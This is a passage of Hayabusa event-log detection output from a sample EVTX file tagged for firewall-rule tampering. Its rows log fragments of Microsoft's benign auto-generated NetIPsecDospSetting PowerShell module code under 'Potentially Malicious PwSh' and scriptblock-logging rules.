IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"etization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] 